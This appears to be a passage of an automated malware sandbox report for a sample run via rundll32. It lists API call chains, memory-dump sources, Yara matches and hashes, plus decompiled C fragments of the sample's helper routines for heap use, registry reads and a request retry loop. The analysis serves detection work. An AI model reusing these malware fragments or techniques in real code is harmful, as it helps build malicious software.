                          • RtlLeaveCriticalSection.NTDLL(05B8A400), ref: 05B7E8AF
                            • Part of subcall function 05B61A0A: lstrlen.KERNEL32(?,?,00000000,?,05B819C5,05B894D8,?,?,00000004,00000000,?,00000000,05B80977,05B7893A,?,?), ref: 05B61A58
                            • Part of subcall function 05B61A0A: VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,?,05B819C5,05B894D8,?,?,00000004,00000000,?,00000000,05B80977), ref: 05B61A6A
                            • Part of subcall function 05B61A0A: lstrcpy.KERNEL32(00000000,?), ref: 05B61A79
                            • Part of subcall function 05B61A0A: VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,?,05B819C5,05B894D8,?,?,00000004,00000000,?,00000000,05B80977), ref: 05B61A8A
                            • Part of subcall function 05B7E803: RtlFreeHeap.NTDLL(00000000,?,05B73953,?,?,05B7BF5B,00000000,00000000,05B610B0,00000000,05B89F2C,00000008,00000003), ref: 05B7E80F
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
                          • String ID:
                          • API String ID: 1872894792-0
                          • Opcode ID: 5d27b7f9ad57be937a3f587b222e635b4d8dd2e32a34f74e163130fe8c378faf
                          • Instruction ID: 7f2bffe77fe7cdf62362a5aaa4174e273e3643f03b367177f3867c155fca975f
                          • Opcode Fuzzy Hash: 5d27b7f9ad57be937a3f587b222e635b4d8dd2e32a34f74e163130fe8c378faf
                          • Instruction Fuzzy Hash: 6CF0A0362212199F87206F289889C79BBADFF8912631551DBE92663310CA76BC41D6D0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • InterlockedIncrement.KERNEL32(05B8A05C), ref: 05B6C9BE
                            • Part of subcall function 05B72331: GetSystemTimeAsFileTime.KERNEL32(?), ref: 05B7235C
                            • Part of subcall function 05B72331: HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 05B72369
                            • Part of subcall function 05B72331: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 05B723F5
                            • Part of subcall function 05B72331: GetModuleHandleA.KERNEL32(00000000), ref: 05B72400
                            • Part of subcall function 05B72331: RtlImageNtHeader.NTDLL(00000000), ref: 05B72409
                            • Part of subcall function 05B72331: RtlExitUserThread.NTDLL(00000000), ref: 05B7241E
                          • InterlockedDecrement.KERNEL32(05B8A05C), ref: 05B6C9E2
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
                          • String ID:
                          • API String ID: 1011034841-0
                          • Opcode ID: fec6114724fee4abc6ff3b1de091453a5d32e5d58eb5497d42b21d885e08b139
                          • Instruction ID: 741f98d7607905841f5d020bd640364035174468283e7a26b519040f0c0a79f6
                          • Opcode Fuzzy Hash: fec6114724fee4abc6ff3b1de091453a5d32e5d58eb5497d42b21d885e08b139
                          • Instruction Fuzzy Hash: 17E0127234C126A7CB226AF49848B7EAF56FB01690F005695F9E9F10D0CA24FC50D6D1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B755E4: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 05B7561D
                            • Part of subcall function 05B755E4: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 05B75653
                            • Part of subcall function 05B755E4: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 05B7565F
                            • Part of subcall function 05B755E4: lstrcmpi.KERNEL32(?,00000000), ref: 05B7569C
                            • Part of subcall function 05B755E4: StrChrA.SHLWAPI(?,0000002E), ref: 05B756A5
                            • Part of subcall function 05B755E4: lstrcmpi.KERNEL32(?,00000000), ref: 05B756B7
                            • Part of subcall function 05B755E4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 05B75708
                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000010,?,?,?,05B860E0,0000002C,05B790D3,05FB8E36,?,00000000,05B7A484), ref: 05B81E2C
                            • Part of subcall function 05B7A806: GetProcAddress.KERNEL32(?,00000000), ref: 05B7A82F
                            • Part of subcall function 05B7A806: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,05B76230,00000000,00000000,00000028,00000100), ref: 05B7A851
                          • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,05B860E0,0000002C,05B790D3,05FB8E36,?,00000000,05B7A484,?,00000318), ref: 05B81EB7
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
                          • String ID:
                          • API String ID: 4138075514-0
                          • Opcode ID: abfd06318ab7bf51fc8303c20c5b9a765faff31a3730814a56104cd392fae439
                          • Instruction ID: 97eacd0d70ed82374204b55c0e4a2f5665215f8128930caf63a92f529b49c6a1
                          • Opcode Fuzzy Hash: abfd06318ab7bf51fc8303c20c5b9a765faff31a3730814a56104cd392fae439
                          • Instruction Fuzzy Hash: 8521C671E02229EBCF11EFA5DC84AEEBBB5FF08720F10916AE914B6150D3346941DF94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetModuleHandleA.KERNEL32(?,00000000,?,00000000,05B80977,05B7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 05B818D5
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: fce7ee20b2179b4d79917a396965a752149f72349d14ca7e4eebc560f0eae70f
                          • Instruction ID: daaca8d517020fb6e20d1df337c01ad3264f5ce94d38e12aa496c11ac0b10749
                          • Opcode Fuzzy Hash: fce7ee20b2179b4d79917a396965a752149f72349d14ca7e4eebc560f0eae70f
                          • Instruction Fuzzy Hash: E3318276A01204EFCB10FF9CD885DBDB7B6FB45220B5554EAE215AB300C730B942CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 92%
                          			E01001C03(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
                          				signed int _v5;
                          				signed int _v12;
                          				void* _t32;
                          				signed int _t37;
                          				signed int _t39;
                          				signed char _t45;
                          				void* _t49;
                          				char* _t51;
                          				signed int _t65;
                          				signed int _t66;
                          				signed int _t69;
                          
                          				_v12 = _v12 & 0x00000000;
                          				_t69 = __eax;
                          				_t32 = RtlAllocateHeap( *0x100a2d8, 0, __eax << 2); // executed
                          				_t49 = _t32;
                          				if(_t49 == 0) {
                          					_v12 = 8;
                          				} else {
                          					 *_a8 = _t49;
                          					do {
                          						_t45 =  *_a4;
                          						asm("cdq");
                          						_t65 = 0x64;
                          						_t37 = (_t45 & 0x000000ff) / _t65;
                          						_v5 = _t37;
                          						if(_t37 != 0) {
                          							 *_t49 = _t37 + 0x30;
                          							_t49 = _t49 + 1;
                          							_t45 = _t45 + _t37 * 0x9c;
                          						}
                          						asm("cdq");
                          						_t66 = 0xa;
                          						_t39 = (_t45 & 0x000000ff) / _t66;
                          						if(_t39 != 0 || _v5 != _t39) {
                          							 *_t49 = _t39 + 0x30;
                          							_t49 = _t49 + 1;
                          							_t45 = _t45 + _t39 * 0xf6;
                          						}
                          						_a4 = _a4 + 1;
                          						 *_t49 = _t45 + 0x30;
                          						 *(_t49 + 1) = 0x2c;
                          						_t49 = _t49 + 2;
                          						_t69 = _t69 - 1;
                          					} while (_t69 != 0);
                          					_t51 = _t49 - 1;
                          					 *_a12 = _t51 -  *_a8;
                          					 *_t51 = 0;
                          				}
                          				return _v12;
			}

                          0x01001c08
                          0x01001c0d
                          0x01001c1b
                          0x01001c21
                          0x01001c25
                          0x01001c96
                          0x01001c27
                          0x01001c2b
                          0x01001c2e
                          0x01001c31
                          0x01001c38
                          0x01001c39
                          0x01001c3a
                          0x01001c3c
                          0x01001c41
                          0x01001c48
                          0x01001c4e
                          0x01001c4f
                          0x01001c4f
                          0x01001c56
                          0x01001c57
                          0x01001c58
                          0x01001c5c
                          0x01001c68
                          0x01001c6e
                          0x01001c6f
                          0x01001c6f
                          0x01001c71
                          0x01001c77
                          0x01001c79
                          0x01001c7e
                          0x01001c7f
                          0x01001c7f
                          0x01001c85
                          0x01001c8e
                          0x01001c90
                          0x01001c93
                          0x01001ca2

                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 01001C1B
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 02149e3b8c2dcbcb11f23f2fd91dbdf63ab3ae60d42362c71dbac5e584561188
                          • Instruction ID: 9f0e5d48d17eebef006f1cd9e557586e0e4a4bb14412e416fcec09463b50cdb6
                          • Opcode Fuzzy Hash: 02149e3b8c2dcbcb11f23f2fd91dbdf63ab3ae60d42362c71dbac5e584561188
                          • Instruction Fuzzy Hash: F611B131285344AFFB168F2DD895BE97BA9DB53358F18408AE5809B2D2C277C50BC720
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetModuleHandleA.KERNEL32(?,05B899DC,-0000000C,?,?,?,05B7C01A,00000006,?,00000000,00000000,05B610B0,00000000,05B89F2C,00000008,00000003), ref: 05B64ADA
                            • Part of subcall function 05B674AE: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,05B8A400), ref: 05B674C5
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HandleInformationModuleProcessQuery
                          • String ID:
                          • API String ID: 2776635927-0
                          • Opcode ID: e50def5a669e6417a5ce92255d493965d87f7cbefe40ab65623be28f94b634d9
                          • Instruction ID: b97523c98d2c39d96d628fa5f419759eb48d7da49aee48bb80c445d01d457959
                          • Opcode Fuzzy Hash: e50def5a669e6417a5ce92255d493965d87f7cbefe40ab65623be28f94b634d9
                          • Instruction Fuzzy Hash: AF21C036200A04AFCF21CF9AC4C0E7A77A6FF4429472884ADE9468B250D676F901CB20
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0100375F(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
                          				intOrPtr _v12;
                          				signed int _v20;
                          				intOrPtr _v24;
                          				signed int _v60;
                          				char _v68;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				intOrPtr _t14;
                          				signed int* _t16;
                          				signed int _t25;
                          				signed int _t26;
                          				signed int* _t28;
                          				signed int _t30;
                          
                          				_t28 = __ecx;
                          				_t14 =  *0x100a368; // 0x5299618
                          				_v12 = _t14;
                          				_t16 = _a12;
                          				_t30 = 8;
                          				if(_t16 != 0) {
                          					 *_t16 =  *_t16 & 0x00000000;
                          				}
                          				do {
                          					_t31 =  &_v68;
                          					if(E0100227F( &_v68) == 0) {
                          						goto L16;
                          					}
                          					_t30 = E01006954(_t31, _a4, _v12);
                          					if(_t30 == 0) {
                          						_t25 = E01001CA5(_t31, _t28); // executed
                          						_t30 = _t25;
                          						if(_t30 != 0) {
                          							if(_t30 == 0x102) {
                          								E0100A000 = E0100A000 + 0xea60;
                          							}
                          						} else {
                          							if(_v24 != 0xc8) {
                          								_t30 = 0xe8;
                          							} else {
                          								_t26 = _v20;
                          								if(_t26 == 0) {
                          									_t30 = 0x10d2;
                          								} else {
                          									_t28 = _a8;
                          									if(_t28 != 0) {
                          										_v60 = _v60 & _t30;
                          										 *_t28 = _v60;
                          										_t28 = _a12;
                          										if(_t28 != 0) {
                          											 *_t28 = _t26;
                          										}
                          									}
                          								}
                          							}
                          						}
                          					}
                          					E01004274( &_v68, 0x102, _t28, _t30);
                          					L16:
                          				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x100a30c, 0) == 0x102);
                          				return _t30;
			}

                          0x0100375f
                          0x01003765
                          0x0100376c
                          0x01003774
                          0x0100377a
                          0x0100377d
                          0x0100377f
                          0x0100377f
                          0x01003787
                          0x01003787
                          0x01003791
                          0x00000000
                          0x00000000
                          0x010037a0
                          0x010037a4
                          0x010037a8
                          0x010037ad
                          0x010037b1
                          0x010037ed
                          0x010037ef
                          0x010037ef
                          0x010037b3
                          0x010037ba
                          0x010037e4
                          0x010037bc
                          0x010037bc
                          0x010037c1
                          0x010037dd
                          0x010037c3
                          0x010037c3
                          0x010037c8
                          0x010037cd
                          0x010037d0
                          0x010037d2
                          0x010037d7
                          0x010037d9
                          0x010037d9
                          0x010037d7
                          0x010037c8
                          0x010037c1
                          0x010037ba
                          0x010037b1
                          0x010037fc
                          0x01003801
                          0x01003801
                          0x01003825

                          APIs
                          • WaitForSingleObject.KERNEL32(00000000,76CC81D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01003811
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: ObjectSingleWait
                          • String ID:
                          • API String ID: 24740636-0
                          • Opcode ID: 5f99bb3af211ad30a4c6e5f01c6184c6f88c8d88ea576e6dd242e8b4efbea928
                          • Instruction ID: 548983efc76e0ead5db680957978d6b6f9363eaa0ea0d6ae1a4959f058d952d1
                          • Opcode Fuzzy Hash: 5f99bb3af211ad30a4c6e5f01c6184c6f88c8d88ea576e6dd242e8b4efbea928
                          • Instruction Fuzzy Hash: 7A2158B670024A9FFB63DF5DD880BAE7BA5BB81350F1040BAE6899B280DB75D8418750
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 34%
                          			E01001B6F(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                          				intOrPtr _v12;
                          				void* _v18;
                          				char _v20;
                          				intOrPtr _t15;
                          				void* _t17;
                          				intOrPtr _t19;
                          				void* _t23;
                          
                          				_v20 = 0;
                          				asm("stosd");
                          				asm("stosd");
                          				asm("stosd");
                          				asm("stosw");
                          				_t15 =  *0x100a348; // 0x428d5a8
                          				_t4 = _t15 + 0x100b3a0; // 0x5298948
                          				_t20 = _t4;
                          				_t6 = _t15 + 0x100b124; // 0x650047
                          				_t17 = E010046CB(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                          				if(_t17 < 0) {
                          					_t23 = _t17;
                          				} else {
                          					_t23 = 8;
                          					if(_v20 != _t23) {
                          						_t23 = 1;
                          					} else {
                          						_t19 = E010059AE(_t20, _v12);
                          						if(_t19 != 0) {
                          							 *_a16 = _t19;
                          							_t23 = 0;
                          						}
                          						__imp__#6(_v12);
                          					}
                          				}
                          				return _t23;
			}

                          0x01001b79
                          0x01001b80
                          0x01001b81
                          0x01001b82
                          0x01001b83
                          0x01001b89
                          0x01001b8e
                          0x01001b8e
                          0x01001b98
                          0x01001baa
                          0x01001bb1
                          0x01001bdf
                          0x01001bb3
                          0x01001bb5
                          0x01001bba
                          0x01001bdc
                          0x01001bbc
                          0x01001bbf
                          0x01001bc6
                          0x01001bcb
                          0x01001bcd
                          0x01001bcd
                          0x01001bd2
                          0x01001bd2
                          0x01001bba
                          0x01001be6

                          APIs
                            • Part of subcall function 010046CB: SysFreeString.OLEAUT32(?), ref: 010047AA
                            • Part of subcall function 010059AE: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,01005EFA,004F0053,00000000,?), ref: 010059B7
                            • Part of subcall function 010059AE: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,01005EFA,004F0053,00000000,?), ref: 010059E1
                            • Part of subcall function 010059AE: memset.NTDLL ref: 010059F5
                          • SysFreeString.OLEAUT32(00000000), ref: 01001BD2
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: FreeString$lstrlenmemcpymemset
                          • String ID:
                          • API String ID: 397948122-0
                          • Opcode ID: b0d3fe706557b4811ad3799c1cbfc298fa706c3ef66a651cab1a311c57cdd165
                          • Instruction ID: ede0f4d5f4b8964309947a8a8229bb482131407d08a59adaada41b0888ada0f2
                          • Opcode Fuzzy Hash: b0d3fe706557b4811ad3799c1cbfc298fa706c3ef66a651cab1a311c57cdd165
                          • Instruction Fuzzy Hash: 35015A32500519BFEB139FA8DC05DEABBB9FB08750F004465EA81E71A0E771E915C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 89%
                          			E01002E4E(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
                          				char _v8;
                          				void* _t14;
                          				intOrPtr _t17;
                          				void* _t20;
                          				void* _t26;
                          
                          				_push(__ecx);
                          				if(_a4 == 0 || __eax == 0) {
                          					_t26 = 0x57;
                          				} else {
                          					_t14 = E01001C03(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
                          					_t26 = _t14;
                          					if(_t26 == 0) {
                          						_t17 =  *0x100a348; // 0x428d5a8
                          						_t9 = _t17 + 0x100ba40; // 0x444f4340
                          						_t20 = E01003B58( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
                          						_t26 = _t20;
                          						RtlFreeHeap( *0x100a2d8, 0, _a4); // executed
                          					}
                          				}
                          				return _t26;
			}

                          0x01002e51
                          0x01002e57
                          0x01002eae
                          0x01002e5d
                          0x01002e68
                          0x01002e6d
                          0x01002e71
                          0x01002e7e
                          0x01002e86
                          0x01002e92
                          0x01002e9a
                          0x01002ea4
                          0x01002ea4
                          0x01002e71
                          0x01002eb3

                          APIs
                            • Part of subcall function 01001C03: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 01001C1B
                            • Part of subcall function 01003B58: lstrlen.KERNEL32(76CDF710,?,00000000,?,76CDF710), ref: 01003B8C
                            • Part of subcall function 01003B58: StrStrA.SHLWAPI(00000000,?), ref: 01003B99
                            • Part of subcall function 01003B58: RtlAllocateHeap.NTDLL(00000000,?), ref: 01003BB8
                          • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,0100553D), ref: 01002EA4
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$Allocate$Freelstrlen
                          • String ID:
                          • API String ID: 2220322926-0
                          • Opcode ID: 1ce8351b5b22a4830f8f5e3077a8011268ffef8a7fefc7bf31e5ca2a82de03fd
                          • Instruction ID: 806b59a9a5035d0f8ac993e210dce8a15e3d7d5adc1bdc948f48efab4319e415
                          • Opcode Fuzzy Hash: 1ce8351b5b22a4830f8f5e3077a8011268ffef8a7fefc7bf31e5ca2a82de03fd
                          • Instruction Fuzzy Hash: 72016D36200608FFEB23CF48CC04EAA7BE9EB54340F104029FA85861A4E772EA459B50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 58%
                          			E01004675(void* _a4, intOrPtr _a8, intOrPtr _a12) {
                          				intOrPtr _t14;
                          				void* _t16;
                          				void* _t17;
                          				void* _t18;
                          
                          				if(_a4 == 0) {
                          					L2:
                          					_t18 =  *0x100a0c8(_a8, _a12,  &_a4);
                          					if(_t18 == 0) {
                          						RegCloseKey(_a4);
                          					}
                          					L4:
                          					return _t18;
                          				}
                          				_t14 =  *0x100a348; // 0x428d5a8
                          				_t2 = _t14 + 0x100b180; // 0x720043
                          				_t16 = E010046CB(_t17, _a4, _a8, _a12, _t2, 0, 0, 0); // executed
                          				_t18 = _t16;
                          				if(_t18 == 0) {
                          					goto L4;
                          				}
                          				goto L2;
			}

                          0x0100467d
                          0x010046a5
                          0x010046b5
                          0x010046b9
                          0x010046be
                          0x010046be
                          0x010046c4
                          0x010046c8
                          0x010046c8
                          0x0100467f
                          0x0100468a
                          0x0100469a
                          0x0100469f
                          0x010046a3
                          0x00000000
                          0x00000000
                          0x00000000

                          APIs
                          • RegCloseKey.ADVAPI32(00000000,?,01006F4E,3D010090,00000000,80000002,?,80000002,?,?,?,01003520,80000002), ref: 010046BE
                            • Part of subcall function 010046CB: SysFreeString.OLEAUT32(?), ref: 010047AA
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: CloseFreeString
                          • String ID:
                          • API String ID: 3574410727-0
                          • Opcode ID: 784645dc6d8ed749dfe08b48b9584b7c4e0fd1590811ef844742a5ce17124364
                          • Instruction ID: ad62bbaf861c82a3ca1d0fea18075d0be092edf6fd640c6287ae2a4139bb2035
                          • Opcode Fuzzy Hash: 784645dc6d8ed749dfe08b48b9584b7c4e0fd1590811ef844742a5ce17124364
                          • Instruction Fuzzy Hash: 06F03032101619FBEB238F44DC44FE93BA8AB08750F048120FF84DA1A0DB31D9649B85
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 05B83090
                            • Part of subcall function 05B831E3: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,000260DC,05B60000), ref: 05B8325C
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionHelper2@8LoadRaise___delay
                          • String ID:
                          • API String ID: 123106877-0
                          • Opcode ID: c706b7577d6591a6d84c347af985cec4ec2442a659fec0f2f0a06422987a0e38
                          • Instruction ID: 78875ba4f56318564f5276cb0b6594b8700e11d3eef3094e07973cbe29e42c42
                          • Opcode Fuzzy Hash: c706b7577d6591a6d84c347af985cec4ec2442a659fec0f2f0a06422987a0e38
                          • Instruction Fuzzy Hash: 87A00295299101BD370475515D46D37175DC4D4D513306D9DE41284050545239459075
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 05B83090
                            • Part of subcall function 05B831E3: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,000260DC,05B60000), ref: 05B8325C
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionHelper2@8LoadRaise___delay
                          • String ID:
                          • API String ID: 123106877-0
                          • Opcode ID: 9daf842a61e10a417674cc59917b0bbfda11416ae24c945b1ea624f6cc0a8fe9
                          • Instruction ID: 9da2604a8a6795e75dc25d9010a152963610475bf96b464cf0c035bcab75c53c
                          • Opcode Fuzzy Hash: 9daf842a61e10a417674cc59917b0bbfda11416ae24c945b1ea624f6cc0a8fe9
                          • Instruction Fuzzy Hash: B0A002952D55017D371475515D46D37175DC4E0D113306D9DF41194050545239459075
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlFreeHeap.NTDLL(00000000,?,05B73953,?,?,05B7BF5B,00000000,00000000,05B610B0,00000000,05B89F2C,00000008,00000003), ref: 05B7E80F
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID:
                          • API String ID: 3298025750-0
                          • Opcode ID: a8718c465ef4caf33a720e45c79329e850671bb8a61e0f7f3bf923f20335e4b9
                          • Instruction ID: c1ed01d6ca840ffe892eb80be9ebfe6a0c659df3c22f8e066de1d36603b4df3a
                          • Opcode Fuzzy Hash: a8718c465ef4caf33a720e45c79329e850671bb8a61e0f7f3bf923f20335e4b9
                          • Instruction Fuzzy Hash: 3CB01231010100BBCA114B00DD06F157F23AB50700F005411B208910A08A317468FB04
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 101dcdee751f592a56f32a6e46039da119537b3d2ee09ca84122b6d0cf98f4f4
                          • Instruction ID: b73367110ce5f559d88ac92af6ecffb9c191f60ef06ba9472a688ada539d8708
                          • Opcode Fuzzy Hash: 101dcdee751f592a56f32a6e46039da119537b3d2ee09ca84122b6d0cf98f4f4
                          • Instruction Fuzzy Hash: 52B01275110100BBCA114B00DE06F157F23A750700F005011B308590A08A317424FB04
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E01006D63(long _a4) {
                          				void* _t2;
                          
                          				_t2 = RtlAllocateHeap( *0x100a2d8, 0, _a4); // executed
                          				return _t2;
                          			}

                          Instruction addresses from the listing: 0x01006d6f, 0x01006d75

                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
